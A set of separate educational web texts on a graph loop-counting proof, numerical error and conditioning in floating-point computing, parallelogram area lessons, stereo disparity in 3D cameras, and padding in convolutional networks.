The property about paths translates into the matrix equation \(M^2 = J\), where \(J\) is a matrix of all ones. (The r-th power of a matrix counts r-step paths between nodes.) This matrix \(J\) has a number of special properties—multiplying a matrix by \(J\) computes its row/column totals (i.e. the number of neighbors for a graph!), multiplying \(J\) by \(J\) produces a scalar multiple of \(J\), and \(J\) zeroes-out any vector whose entries sum to zero; this is an \(n-1\) dimensional subspace. The property that \(M^2=J\), along with special properties of \(J\), allows you to conclude that higher powers of \(M\) are all just multiples of \(J\); in particular, examining \(M^3=MJ=JM\) reveals that every node in the graph has the same number of neighbors \(k\). So \(M^3 = kJ\). (And \(k^2 = n\) because \(k^2\) is the number of two-step paths, which lead uniquely to each node in the graph.) Notice that because of this neighbor property, \(M\) sends a column vector of all ones to a column vector of all k's, so \(M\) has an eigenvalue \(k\). Based on the powers of \(M\), \(M\) furthermore has \((n-1)\) generalized eigenvectors with eigenvalue zero. There are always exactly \(n\) independent generalized eigenvalues, and we've just found all of them. Their sum is \(0+0+0+\ldots+0+k = k\), which establishes the result.
The same procedure establishes a more general result: If there's a unique r-step path between every pair of nodes in a graph, then every node has k neighbors and the graph has k loops, where \(k^r\) is the number of nodes in the graph. | <urn:uuid:f72695bc-4308-494d-82b8-29fad0b552f0> | CC-MAIN-2023-14 | http://illuminium.org/loop-counting/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00608.warc.gz | en | 0.913334 | 586 | 3.03125 | 3 |
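The hypothesis of the theorem is not vacuous. For any \(k\), the directed graph whose nodes are the ordered pairs \((a,b)\) with \(a, b \in \{0, \dots, k-1\}\), and whose edges are \((a,b) \to (b,c)\), has a unique two-step path between every pair of nodes (the middle node of a path from \((a,b)\) to \((c,d)\) is forced to be \((b,c)\)). Here is a Python sketch verifying the theorem's conclusions for \(k = 3\); this de Bruijn-style construction is our illustrative example, not part of the argument above:

```python
# Verify: a graph with a unique two-step path between every pair of
# nodes has k loops and out-degree k everywhere, where k^2 = n.
k = 3
nodes = [(a, b) for a in range(k) for b in range(k)]
n = len(nodes)                         # n = k^2 = 9
index = {v: i for i, v in enumerate(nodes)}

# adjacency matrix M: edge (a, b) -> (b, c) for every c
M = [[0] * n for _ in range(n)]
for (a, b) in nodes:
    for c in range(k):
        M[index[(a, b)]][index[(b, c)]] = 1

# M^2 counts two-step paths; uniqueness means M^2 = J (all ones)
M2 = [[sum(M[i][t] * M[t][j] for t in range(n)) for j in range(n)]
      for i in range(n)]
assert all(M2[i][j] == 1 for i in range(n) for j in range(n))

loops = sum(M[i][i] for i in range(n))   # trace counts loops
out_degrees = {sum(row) for row in M}    # neighbor counts
print(loops, out_degrees)                # k loops, out-degree k
```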
Error is the discrepancy between a quantity and the value used to represent it in the program. A result is accurate if its error is small. If \(\hat{x}\) is an approximation for \(x\), then

- the absolute error is \(\hat{x} - x\), and
- the relative error is \(\frac{\hat{x} - x}{x}\).
We are usually more interested in relative error, since the relevance of an error is usually in proportion to the quantity being represented. For example, misreporting the weight of an animal by one kilogram would be much more significant if the animal were a squirrel than if it were a blue whale.
For example, `sqrt(200.0)`, which returns the `Float64` square root of 200, yields \(14.142135623730951\). The actual decimal representation of \(\sqrt{200}\) is \(14.14213562373095048\ldots\) The difference between these values, approximately \(5 \times 10^{-16}\), is the absolute error, and approximately \(3.5 \times 10^{-17}\) is the relative error.
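The two errors can be measured directly. Here is a Python sketch (Python's 64-bit floats use the same IEEE double-precision arithmetic as Julia's `Float64`; using `decimal` for a high-precision reference is our choice):

```python
from decimal import Decimal, getcontext
import math

getcontext().prec = 40                  # 40 significant digits
approx = math.sqrt(200.0)               # double-precision square root
exact = Decimal(200).sqrt()             # high-precision reference

abs_err = Decimal(approx) - exact       # absolute error
rel_err = abs_err / exact               # relative error
print(abs_err, rel_err)
```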
Sources of Numerical Error
There are a few categories of numerical error.
Roundoff error comes from rounding numbers to fit them into a floating point representation.
`0.2 + 0.1` is equal to \(0.30000000000000004\) in `Float64` arithmetic. The discrepancy between 0.3 and this value is roundoff error.
Truncation error comes from using approximate mathematical formulas or algorithms.
The Maclaurin series of \(\sin x\) is \(x - \frac{x^3}{3!} + \frac{x^5}{5!} - \cdots\), so approximating \(\sin x\) as \(x - \frac{x^3}{6}\) yields a truncation error equal to the omitted terms \(\frac{x^5}{5!} - \frac{x^7}{7!} + \cdots\)
Newton's method approximates a zero of a function \(f\) by starting with a value \(x_0\) near the desired zero and defining \(x_{n+1} = x_n - \frac{f(x_n)}{f'(x_n)}\) for all \(n \geq 0\).
Under certain conditions, \(x_n\) converges to a zero of \(f\) as \(n \to \infty\). The discrepancy between \(x_n\) and \(\lim_{k\to\infty} x_k\) is the truncation error associated with stopping Newton's method at the \(n\)th iteration.
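To see truncation error shrink with the number of iterations, here is a Python sketch of Newton's method applied to \(f(x) = x^2 - 2\), whose positive zero is \(\sqrt{2}\) (the function and starting point are our choices):

```python
def newton(f, fprime, x0, steps):
    x = x0
    for _ in range(steps):
        x = x - f(x) / fprime(x)
    return x

f = lambda x: x * x - 2.0
fp = lambda x: 2.0 * x
for n in [1, 2, 3, 4, 5]:
    xn = newton(f, fp, 1.0, n)
    # the truncation error shrinks rapidly (quadratic convergence)
    print(n, abs(xn - 2 ** 0.5))
```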
We may approximate the value of a definite integral \(\int_0^1 f(x)\,dx\) using a finite sum such as \(\frac{1}{n}\sum_{k=1}^{n} f\!\left(\frac{k}{n}\right)\). The error associated with this approximation is a type of truncation error.
Statistical error arises from using randomness in an approximation.
We can approximate the average height of a population of 100,000 people by selecting 100 people uniformly at random and averaging their measured heights. The error associated with this approximation is an example of statistical error.
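A minimal Python sketch of this kind of statistical error, with a synthetic population standing in for the measured heights (the seed and population values are our choices):

```python
import random

population = list(range(100_000))        # synthetic "heights"
true_mean = sum(population) / len(population)

random.seed(0)                           # fix the randomness
sample = random.sample(population, 100)  # 100 uniformly random people
estimate = sum(sample) / len(sample)
# the gap between estimate and true_mean is statistical error
print(true_mean, estimate)
```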
Discuss the error in each of the following scenarios using the terms roundoff error, truncation error, or statistical error.
- We use the trapezoid rule with 1000 trapezoids to approximate .
- We are trying to approximate \(f'(5)\) for some function `f` that we can compute, and we attempt to do so by running `(f(5 + 0.5^100) - f(5))/0.5^100`. We fail to get a reasonable answer.
- To approximate the minimum of a function \(f\), we evaluate \(f\) at 100 randomly selected points in its domain and return the smallest value obtained.
- The more trapezoids we use, the more accurate our answer will be. The difference between the exact answer and the value we get when we stop at 1000 trapezoids is truncation error.
- The real problem here is roundoff error. `5 + 0.5^100` gets rounded off to 5.0, so the numerator will always evaluate to 0. However, even if we used a `BigFloat` version of each of these values, there would still be truncation error in this approximation, since the expression we used was obtained by cutting off the limit in the definition of the derivative at a small but positive increment size.
- This is an example of statistical error, since the output of the algorithm depends on the randomness we use to select the points.
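The roundoff failure in item 2 can be reproduced directly. A Python sketch, with `f(x) = x²` as a stand-in for the function being differentiated:

```python
f = lambda x: x * x       # any smooth function we can evaluate
h = 0.5 ** 100            # far below double-precision resolution near 5

print(5.0 + h == 5.0)                # True: 5 + h rounds back to 5.0
print((f(5.0 + h) - f(5.0)) / h)     # 0.0, not the derivative 10.0
```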
The derivative of a single-variable function may be thought of as a measure of how the function stretches or compresses absolute error: if the input of \(f\) changes from \(x\) to \(x + \Delta x\), then the output changes by approximately \(f'(x)\,\Delta x\).
The condition number of a function measures how it stretches or compresses relative error. Just as the derivative helps us understand how small changes in input transform to small changes in output, the condition number tells us how a small relative error in the initial data of a problem affects the relative error of the solution. We will use the variable \(a\) to denote a problem's initial data and \(S(a)\) to denote the solution of the problem with initial data \(a\).
The condition number of a function is defined to be the absolute value of the ratio of the relative change in output of the function to a very small relative change in the input. The condition number of a problem is the condition number of the function which maps the problem's initial data to its solution.
If \(S\) is the map from the initial data \(a\) of a problem to its solution \(S(a)\), then the condition number of the problem is
\[ \kappa(a) = \left| \frac{a\,S'(a)}{S(a)} \right|. \]
Show that the condition number of \(f(x) = x^n\) is constant, for any \(x \neq 0\).

Solution. We have
\[ \kappa(x) = \left| \frac{x\,f'(x)}{f(x)} \right| = \left| \frac{x \cdot n x^{n-1}}{x^n} \right| = |n| \]
for all \(x \neq 0\).
Show that the condition number of the function \(f(x) = x - 1\) is very large for values of \(x\) near 1.

Solution. We substitute into the formula for the condition number and get
\[ \kappa(x) = \left| \frac{x\,f'(x)}{f(x)} \right| = \left| \frac{x}{x - 1} \right|, \]
which is very large for values of \(x\) near \(1\). This expression goes to infinity as \(x \to 1\), so the condition number is very large.
Subtracting 1 from two numbers near 1 preserves their difference but makes the numbers themselves much smaller, so it greatly magnifies their relative difference.
If \(a = 1.01\), then the solution of the equation \(x + 1 = a\) is \(x = 0.01\). If we change the initial data to \(1.01(1+\epsilon)\), then the solution changes to \(0.01 + 1.01\epsilon\), which represents a relative change of
\[ \frac{1.01\epsilon}{0.01} = 101\epsilon \]
in the solution. The relative change in input is \(\epsilon\), so taking the absolute value of the ratio of \(101\epsilon\) to \(\epsilon\) and sending \(\epsilon \to 0\), we see that the condition number of this problem is \(101\).
Consider a function \(f\). If the input changes from \(a\) to \(a(1+\epsilon)\) for some small value \(\epsilon\), then the output changes to approximately \(f(a) + a f'(a)\,\epsilon\). Calculate the ratio of the relative change in the output to the relative change in the input, and show that you get
\[ \frac{a\,f'(a)}{f(a)}. \]

Solution. The relative change in output is
\[ \frac{\bigl(f(a) + a f'(a)\,\epsilon\bigr) - f(a)}{f(a)} = \frac{a f'(a)}{f(a)}\,\epsilon, \]
and the relative change in input is \(\frac{a(1+\epsilon) - a}{a} = \epsilon\). Dividing these two quantities gives
\[ \frac{a\,f'(a)}{f(a)}. \]
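A quick numerical check of this formula in Python, using \(f(x) = x^2\), for which \(\frac{x f'(x)}{f(x)} = 2\) everywhere (the test point and increment are our choices):

```python
# Estimate the condition number of f(x) = x**2 at a = 3 by comparing
# the relative change in output to a small relative change in input.
f = lambda x: x ** 2
a, eps = 3.0, 1e-7

rel_in = eps
rel_out = (f(a * (1 + eps)) - f(a)) / f(a)
kappa = abs(rel_out / rel_in)
print(kappa)    # close to 2
```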
More generally, if the initial data \(\mathbf{a}\) is in \(\mathbb{R}^n\) and the solution \(S(\mathbf{a})\) is in \(\mathbb{R}^m\), then the condition number is defined to be
\[ \kappa(\mathbf{a}) = \frac{\left\|\frac{\partial S}{\partial \mathbf{a}}\right\|\,|\mathbf{a}|}{|S(\mathbf{a})|}, \]
where \(\frac{\partial S}{\partial \mathbf{a}}\) denotes the Jacobian matrix of \(S\) and \(\|\cdot\|\) denotes the operator norm.
Well conditioned and ill-conditioned problems
If the condition number of a problem is very large, then small errors in the problem data lead to large changes in the result. A problem with large condition number is said to be ill-conditioned. Unless the initial data can be specified with correspondingly high precision, it will not be possible to solve the problem meaningfully.
Example. Consider the following matrix equation for \(x\) and \(y\):
\[ \begin{bmatrix} a & 3 \\ 6 & 9 \end{bmatrix}\begin{bmatrix} x \\ y \end{bmatrix} = \begin{bmatrix} 4 \\ 5 \end{bmatrix}. \]
Find the values of \(a\) for which solving this equation for \(x\) and \(y\) is ill-conditioned.

Solution. If \(a \neq 2\), then the solution of this equation is
\[ \begin{bmatrix} x \\ y \end{bmatrix} = \frac{1}{9a - 18}\begin{bmatrix} 21 \\ 5a - 24 \end{bmatrix}. \]
Using the formula for \(\kappa\) above, we can work out (after several steps) an explicit expression for the condition number; the key feature is a factor of \(a - 2\) in its denominator. If \(a\) is very close to \(2\), then \(\kappa\) is very large, and the matrix is ill-conditioned:
```julia
[2.01 3; 6 9] \ [4; 5]
[2.02 3; 6 9] \ [4; 5]
```
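The same sensitivity can be seen without any linear-algebra library. A Python sketch that solves this particular \(2 \times 2\) system by Cramer's rule (a hand-rolled illustration, not the text's code):

```python
# Solve [a 3; 6 9] [x, y]^T = [4, 5]^T by Cramer's rule.
def solve(a):
    det = a * 9 - 3 * 6          # determinant, zero at a = 2
    x = (4 * 9 - 3 * 5) / det
    y = (a * 5 - 4 * 6) / det
    return x, y

print(solve(2.01))   # roughly (233.3, -155.0)
print(solve(2.02))   # roughly (116.7, -77.2)
```

A half-percent change in one matrix entry halves the solution.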
Machine epsilon, denoted \(\epsilon_{\text{mach}}\), is the maximum relative error associated with rounding a real number to the nearest value representable as a given floating point type. For `Float64`, this value is \(2^{-53} \approx 1.11 \times 10^{-16}\).

A competing convention, more widely used outside academia, defines machine epsilon to be the difference between 1 and the next representable number, which for `Float64` is \(2^{-52} \approx 2.22 \times 10^{-16}\). This is the value returned by `eps()` in Julia.

Since we typically introduce a relative error on the order of \(\epsilon_{\text{mach}}\) just to encode the initial data of a problem, the relative error of the computed solution should be expected to be no smaller than \(\kappa\,\epsilon_{\text{mach}}\), where \(\kappa\) is the condition number of the problem, regardless of the algorithm used.
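Both conventions are easy to check. A Python sketch (Python's `sys.float_info.epsilon` reports the gap convention):

```python
import sys

# Gap convention: distance from 1.0 to the next representable double
print(sys.float_info.epsilon == 2.0 ** -52)   # True

# Rounding convention: relative rounding error is at most 2^-53, so
# adding 2^-53 to 1.0 has no effect (the tie rounds to even)
print(1.0 + 2.0 ** -53 == 1.0)                # True
print(1.0 + 2.0 ** -52 == 1.0)                # False
```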
An algorithm used to solve a problem is stable if it is approximately as accurate as the condition number of the problem allows. In other words, an algorithm is unstable if the answers it produces have relative error many times larger than \(\kappa\,\epsilon_{\text{mach}}\).
Consider the problem of evaluating \(f(x) = \sqrt{x^2 + 1} - 1\) for values of \(x\) near 0. Show that the problem is well-conditioned, but that the algorithm of evaluating the expression following the order of operations is unstable.
Comment on whether there are stable algorithms for evaluating \(f\) near \(0\).
Solution. Substituting this function into the condition number formula, we find that
\[ \kappa(x) = \left| \frac{x\,f'(x)}{f(x)} \right| = \frac{x^2}{\sqrt{x^2+1}\left(\sqrt{x^2+1} - 1\right)}. \]
Therefore, \(\kappa(x) \to 2\) as \(x \to 0\), which means that this problem is well-conditioned at 0. However, the algorithm of substituting directly includes an ill-conditioned step: subtracting 1.

What's happening is that a roundoff error of approximately \(\epsilon_{\text{mach}}\) is introduced when \(x^2 + 1\) is rounded to the nearest `Float64`. When 1 is subtracted, we still have an absolute error of around \(\epsilon_{\text{mach}}\). Since \(f(x) \approx x^2/2\) for small \(x\), the value we are computing is tiny, and that means that the relative error in the value we find for \(f(x)\) will be approximately \(2\epsilon_{\text{mach}}/x^2\). If \(x\) is small, this will be many times larger than \(\kappa\,\epsilon_{\text{mach}}\).
There are stable algorithms for approximating \(f\) near \(0\). For example, we could use the Taylor series
\[ \sqrt{x^2+1} - 1 = \frac{x^2}{2} - \frac{x^4}{8} + \frac{x^6}{16} - \cdots \]
and approximate \(f(x)\) as a sum of the first several terms on the right-hand side. Since power functions are well-conditioned (and performing the subtractions is also well-conditioned as long as \(x\) is small enough that each term is much smaller than the preceding one), this algorithm is stable. Alternatively, we can use the identity
\[ \sqrt{x^2+1} - 1 = \frac{x^2}{\sqrt{x^2+1} + 1}, \]
which can be obtained by multiplying \(\sqrt{x^2+1} - 1\) by \(\frac{\sqrt{x^2+1}+1}{\sqrt{x^2+1}+1}\) and simplifying the numerator. Substituting into this expression is stable, because adding 1, square rooting, and reciprocating are all well-conditioned here.
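The unstable and stable algorithms can be compared directly. A Python sketch (the test point \(x = 10^{-8}\) is our choice; the true value there is about \(x^2/2 = 5 \times 10^{-17}\)):

```python
import math

def direct(x):
    # unstable near 0: catastrophic cancellation in the subtraction
    return math.sqrt(x * x + 1.0) - 1.0

def stable(x):
    # algebraically identical, but no cancellation
    return x * x / (math.sqrt(x * x + 1.0) + 1.0)

x = 1e-8
print(direct(x))   # 0.0 -- every digit lost
print(stable(x))   # about 5e-17
```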
Matrix condition number
The condition number of an \(n \times n\) matrix \(A\) is defined to be the maximum condition number of the function \(\mathbf{x} \mapsto A\mathbf{x}\) as \(\mathbf{x}\) ranges over \(\mathbb{R}^n\). The condition number of \(A\) can be computed using its singular value decomposition:
\[ \kappa(A) = \frac{\sigma_{\text{max}}(A)}{\sigma_{\text{min}}(A)}. \]
Show that the condition number of a matrix is equal to the ratio of its largest and smallest singular values.
Interpret your results by explaining how to choose two vectors with small relative difference which are mapped to two vectors with large relative difference by \(A\), assuming that \(A\) has a singular value which is many times larger than another. Use the figure below to help with the intuition.
Solution. The derivative of the transformation \(\mathbf{x} \mapsto A\mathbf{x}\) is the matrix \(A\) itself, and the operator norm of \(A\) is equal to its largest singular value. Therefore, to maximize \(\kappa(\mathbf{x}) = \frac{\|A\|\,|\mathbf{x}|}{|A\mathbf{x}|}\), we minimize the ratio \(\frac{|A\mathbf{x}|}{|\mathbf{x}|}\). This ratio is minimized when \(\mathbf{x}\) is the right singular vector with the least singular value. Therefore, the maximum possible value of \(\kappa(\mathbf{x})\) is the ratio of the largest singular value of \(A\) to the smallest singular value of \(A\).
Find the condition number of the function \(\mathbf{x} \mapsto A\mathbf{x}\), where `A = [1 2; 3 4]`, and show that there is a vector \(\mathbf{v}\) and an error \(\mathbf{e}\) for which the relative error is indeed magnified by approximately the condition number of \(A\).
```julia
using LinearAlgebra
A = [1 2; 3 4]
```
Solution. We choose \(\mathbf{v}\) and \(\mathbf{e}\) to be the columns of \(V\) in the singular value decomposition of \(A\).

```julia
using LinearAlgebra
A = [1 2; 3 4]
U, S, V = svd(A)
σmax, σmin = S
κ = σmax/σmin
v = V[:,2]
e = V[:,1]
rel_error_output = norm(A*(v+e) - A*v)/norm(A*v)
rel_error_input = norm(v + e - v) / norm(v)
rel_error_output / rel_error_input, κ
```
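For a \(2 \times 2\) matrix the singular values can also be computed by hand, since the squared singular values are the eigenvalues of \(A^T A\). A Python sketch of that closed-form route (our own device, not the exercise's):

```python
import math

# Condition number of A = [[1, 2], [3, 4]] from its singular values.
a, b, c, d = 1.0, 2.0, 3.0, 4.0

# entries of the symmetric matrix A^T A = [[p, q], [q, r]]
p, q, r = a*a + c*c, a*b + c*d, b*b + d*d

# eigenvalues of a symmetric 2x2 matrix: mean +/- discriminant
mean = (p + r) / 2.0
disc = math.sqrt(((p - r) / 2.0) ** 2 + q * q)
smax = math.sqrt(mean + disc)
smin = math.sqrt(mean - disc)
kappa = smax / smin
print(smax, smin, kappa)   # kappa is about 14.93
```

As a sanity check, the product of the singular values equals \(|\det A| = 2\).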
Integer or floating point arithmetic can overflow, and may do so without warning.
In September 2013, NASA lost touch with the Deep Impact space probe because systems on board tracked time as a 32-bit-signed-integer number of tenth-second increments from January 1, 2000. The number of such increments reached the maximum size of a 32-bit signed integer in August of 2013.
Errors resulting from performing ill-conditioned subtractions are called catastrophic cancellation.
Approximating \(\sqrt{10^6+1} - \sqrt{10^6}\) with the result of `sqrt(10^6 + 1) - sqrt(10^6)`, we get a relative error of approximately \(10^{-10}\), while using `1/(sqrt(10^6 + 1) + sqrt(10^6))` gives a relative error of approximately \(10^{-16}\) (more than a thousand times smaller).
Use your knowledge of floating point arithmetic to explain why computing \(\sqrt{10^6+1} - \sqrt{10^6}\) directly is much less precise than computing \(\frac{1}{\sqrt{10^6+1} + \sqrt{10^6}}\).

Solution. The gaps between successive representable positive values get wider as we move to the right on the number line. Therefore, the error of the first calculation is the roundoff error associated with calculating `sqrt(10^6+1)`, which is roughly \(10^{-13}\) in absolute terms, large compared with the value of the difference (about \(5 \times 10^{-4}\)).

The relative error in `1/(sqrt(10^6 + 1) + sqrt(10^6))`, meanwhile, is approximately the same as the relative error in the calculation of `sqrt(10^6 + 1) + sqrt(10^6)` (since the condition number of the reciprocal function is approximately 1). This relative error is only about \(10^{-16}\).
If you rely on exact comparisons for floating point numbers, be alert to the differences between `Float64` arithmetic and real number arithmetic:

```julia
function increment(n)
    a = 1.0
    for i = 1:n
        a = a + 0.01
    end
    a
end

increment(100) > 2

(increment(100) - 2) / eps(2.0)
```
Each time we add \(0.01\), we have to round off the result to represent it as a `Float64`. These roundoff errors accumulate and lead to a result which is two ticks to the right of 2.0.
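The same accumulation can be reproduced in Python, whose floats are the same IEEE doubles:

```python
a = 1.0
for _ in range(100):
    a += 0.01          # each addition rounds to the nearest double
print(a == 2.0, a)     # False -- a is slightly greater than 2.0
```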
It is often more appropriate to compare real numbers using `≈` (typed as `\approx«tab»`), which checks that two numbers \(x\) and \(y\) differ by at most \(\sqrt{\epsilon_{\text{mach}}}\,\max(|x|, |y|)\).
Guess what value the following code block returns. Run it and see what happens. Discuss why your initial guess was correct or incorrect, and suggest a value near 0.1 that you could use in place of 0.1 to get the expected behavior.
```julia
function increment_till(t, step=0.1)
    x = 0.5
    while x < t
        x += step
    end
    x
end

increment_till(1.0)
```
Solution. It's reasonable to guess that the returned value will be 1.0. However, it's actually approximately 1.1. The reason is that adding the Float64 representation of 0.1 ten times starting from 0.0 results in a number slightly smaller than 1.0. It turns out that 0.6 (the real number) is 20% of the way from the Float64 tick before it to the Float64 tick after it:

```julia
(6//10 - floor(2^53 * 6//10) // 2^53) * 2^53
```

This means that the Float64 sum is less than the mathematical sum after adding 0.1 once, then less again after adding 0.1 a second time, and so on. By the time we get to 1.0, we've lost a full tick spacing, so after 5 iterations `x` is equal to `0.9999999999999999`, which is less than 1.0. The loop therefore runs one extra time, and the returned value is approximately \(1.1\).
We could use 1/8 = 0.125 instead of 0.1 to get the expected behavior, since small inverse powers of 2 and their sums with small integers can be represented exactly as 64-bit floating points numbers. | <urn:uuid:37f97b5a-c219-4100-bdb3-a5897c01b48e> | CC-MAIN-2023-14 | https://mathigon.org/course/numerical-computing/error | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945292.83/warc/CC-MAIN-20230325002113-20230325032113-00008.warc.gz | en | 0.908335 | 3,052 | 3.984375 | 4 |
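A direct Python replication of `increment_till`, including the suggested `0.125` fix:

```python
def increment_till(t, step=0.1):
    x = 0.5
    while x < t:
        x += step
    return x

print(increment_till(1.0))          # about 1.1, not 1.0
print(increment_till(1.0, 0.125))   # exactly 1.0: 1/8 is a power of 2
```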
Students were introduced to parallel lines in grade 4. While the standards do not explicitly state that students must work with parallelograms in grades 3–5, the geometry standards in those grades invite students to learn about and explore quadrilaterals of all kinds. The K–6 Geometry Progression gives examples of the kinds of work that students can do in this domain, including work with parallelograms.
In this lesson, students analyze the defining attributes of parallelograms, observe other properties that follow from that definition, and use reasoning strategies from previous lessons to find the areas of parallelograms.
By decomposing and rearranging parallelograms into rectangles, and by enclosing a parallelogram in a rectangle and then subtracting the area of the extra regions, students begin to see that parallelograms have related rectangles that can be used to find the area.
Throughout the lesson, students encounter various parallelograms that, because of their shape, encourage the use of certain strategies. For example, some can be easily decomposed and rearranged into a rectangle. Others—such as ones that are narrow and stretched out—may encourage students to enclose them in rectangles and subtract the areas of the extra pieces (two right triangles).
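The enclose-and-subtract strategy amounts to a one-line calculation. Writing \(b\) for the base, \(h\) for the height, and \(a\) for the horizontal offset of the slanted sides (our symbols, not the lesson's), enclosing the parallelogram in a rectangle of width \(b + a\) and subtracting the two right triangles gives
\[ (b + a)h - 2 \cdot \tfrac{1}{2}ah = bh, \]
the familiar base-times-height formula.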
After working with a series of parallelograms, students attempt to generalize (informally) the process of finding the area of any parallelogram (MP8).
Note that these materials use the “dot” notation (for example \(2 \cdot 3\)) to represent multiplication instead of the “cross” notation (for example \(2 \times 3\)). This is because students will be writing many algebraic expressions and equations in this course, sometimes involving the letter \(x\) used as a variable. This notation will be new for many students, and they will need explicit guidance in using it.
- Compare and contrast (orally) different strategies for determining the area of a parallelogram.
- Describe (orally and in writing) observations about the opposites sides and opposite angles of parallelograms.
- Explain (orally and in writing) how to find the area of a parallelogram by rearranging or enclosing it in a rectangle.
Let’s investigate the features and area of parallelograms.
- I can use reasoning strategies and what I know about the area of a rectangle to find the area of a parallelogram.
- I know how to describe the features of a parallelogram using mathematical vocabulary.
A parallelogram is a type of quadrilateral that has two pairs of parallel sides.
Here are two examples of parallelograms.
A quadrilateral is a type of polygon that has 4 sides. A rectangle is an example of a quadrilateral. A pentagon is not a quadrilateral, because it has 5 sides.
Print Formatted Materials
Teachers with a valid work email address can click here to register or sign in for free access to Cool Down, Teacher Guide, and PowerPoint materials.
| Material | Format |
|---|---|
| Student Task Statements | docx |
| Cumulative Practice Problem Set | docx |
| Cool Down | Log In |
| Teacher Guide | Log In |
| Teacher Presentation Materials | docx |
One of our clients has been heavily involved in 3D video for several years. Several others, however, are just now starting to think about it because of the uptick of interest in the consumer electronics world. Enough questions have been posed to us recently that it seemed worthwhile to pull together a few basic facts regarding 3D stereo-pair imaging and stereo disparity.
First, we need a simple model of a lens. Consider the diagram below:
In this picture, the long horizontal line that passes through the center of the lens is called the lens axis. The lens has the property that rays that pass through the center of the lens are undeviated. Therefore, the ray from the top of the tree, at a distance l to the left of the lens, passes straight through the center of the lens. (The tree has a height of h.) The lens also has the property that rays that arrive perpendicular to the lens are refracted to pass through the focal point of the lens. The focal point lies on the lens axis and is a distance f from the center of the lens. The intersection of these two rays shows where the image of the tree will be formed. You can see that the image of the tree is upside down, and has a new height h’. The image is formed a distance d to the right of the focal point.
By using similar triangles (formed by the undeviated ray through the center of the lens) we see first that

h / l = h' / (f + d)
Using a different pair of similar triangles (formed by the refracted ray on either side of the focal point) we also see that

h / f = h' / d
Solving the first equation above for h’. substituting the result into the second equation and simplifying, we derive the following relationship:
This is the fundamental equation of a simple lens. It shows that as the object gets further and further from the lens, i.e. as l increases, the distance of the image of the object from the focal plane decreases, i.e., d gets smaller. We can assume that the camera’s image sensor is located at a distance f from the lens, is perpendicular to the lens axis, and that all objects more than a certain distance away from the lens will be in focus. In other words, the image of all sufficiently distant objects will appear on the focal plane where the image sensor is located.
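The relationship d = f^2 / (l - f) (Newton's form of the thin-lens equation) makes this behavior easy to check numerically; a minimal sketch, with an assumed 50 mm focal length:

```python
def image_offset(l, f):
    """Distance d of the image behind the focal point, from Newton's form
    of the thin-lens equation: d * (l - f) = f**2."""
    if l <= f:
        raise ValueError("object must be farther from the lens than the focal length")
    return f ** 2 / (l - f)

f = 0.05  # assumed focal length: 50 mm, in meters
for l in (0.5, 1.0, 10.0, 100.0):
    print(f"l = {l:6.1f} m -> d = {image_offset(l, f) * 1000:.3f} mm")
```

The printed offsets shrink rapidly toward zero as l grows, which is why the sensor can sit at the focal plane and keep all sufficiently distant objects in focus.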
In the case of 3D video, two cameras are used to acquire a sequence of stereo-pair images, one from the left camera and one from the right. Different stereo geometries are possible, but the most common one is to place the two cameras horizontally apart from each other by a distance i, and to keep their focal planes coplanar. The diagram below illustrates this configuration:
The horizontal line at the bottom is the focal plane; it is clear from the diagram that the focal planes are coplanar. The lenses are a distance f from the focal plane and are separated by a distance of i from each other. We assume that a small object (or a point on a larger object) is located a distance l from the lens plane and a distance m to the right of the axis of the right lens. We want to know where the image of that object appears in the left and the right camera. In particular, we want to know if we overlaid the left image on top of the right image, how far apart would the images appear? Mathematically, we want to know the disparity, which we define to be
ρ = s1 - s2
where s1 and s2 are the distances from the image point to the intersection of the lens axis with the focal plane for the left and the right cameras respectively. Note that we are assuming that the object being imaged is far enough away that its image forms on the focal plane.
Using our favorite trick of similar triangles we have the following two equations:

s1 / f = (m + i) / l

s2 / f = m / l
Solving the first equation for s1, the second equation for s2, taking the difference and simplifying yields

ρ = f · i / l
Although this expression was derived for an object to the right of the axis of the right camera, it is easy to show in a similar manner that it is also true for an object between the axes of the two cameras as well as for an object to the left of the axis of the left camera.
So what does this equation tell us? First, it says that for this particular camera geometry (in which the focal length f is fixed), the disparity is only a function of the separation between the two cameras, i, and the distance of the object from the lens plane, l. Second, the equation tells us that the disparity increases as we increase the separation between the cameras. Finally, it tells us that the disparity decreases as the object gets further away from the cameras, approaching zero for objects an infinite distance away. (You can see this when you watch 3D content without wearing the special 3D glasses: The “distant” objects can be seen by the naked eye, whereas the near objects appear blurry to the naked eye because the value of ρ is greater.)
It should be clear from this equation that if a stereo pair is available, and corresponding points can be found in the left and right pictures, that the disparity between those points can be measured, and the distance to the point can be computed.
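That computation can be sketched directly from the disparity relation ρ = f · i / l derived above, solved for the depth l. The focal length, baseline, and disparity below are made-up values for illustration only:

```python
def depth_from_disparity(f, i, rho):
    """Distance l of a point from the lens plane, given focal length f,
    camera baseline i, and measured disparity rho (all in consistent units):
    rho = f * i / l  =>  l = f * i / rho."""
    if rho <= 0:
        raise ValueError("disparity must be positive for a finite depth")
    return f * i / rho

# Hypothetical numbers: 8 mm focal length, 65 mm baseline,
# and a disparity of 0.2 mm measured on the sensor.
l = depth_from_disparity(f=0.008, i=0.065, rho=0.0002)
print(f"estimated depth: {l:.2f} m")  # estimated depth: 2.60 m
```

Finding the corresponding points in the left and right images (the "stereo matching" problem) is the hard part in practice; once the disparity is known, the depth falls out of this one-line formula.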
Mike Perkins, Ph.D., is a managing partner of Cardinal Peak and an expert in algorithm development for video and signal processing applications. | <urn:uuid:655d2d62-6e15-4be6-987b-e5d49461c316> | CC-MAIN-2023-14 | https://www.cardinalpeak.com/blog/the-basics-of-3d-image-acquisition | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949694.55/warc/CC-MAIN-20230401001704-20230401031704-00608.warc.gz | en | 0.946049 | 1,214 | 3.546875 | 4 |
I wonder why these features are necessary, because I think a constant plane contains no information and it makes the network larger and consequently harder to train.
In many implementations of convolutional layers, the filters do not neatly remain inside the features plane when "sliding" along it, but (conceptually) also partially go "outside" the plane (where always at least one "cell" of the filter will still be inside the plane). Intuitively, in the case of a $3\times3$ filter for example, you can imagine that we pad the input features with an extra border of size $1$, and this padding around the "real" input planes is filled with $0$s.
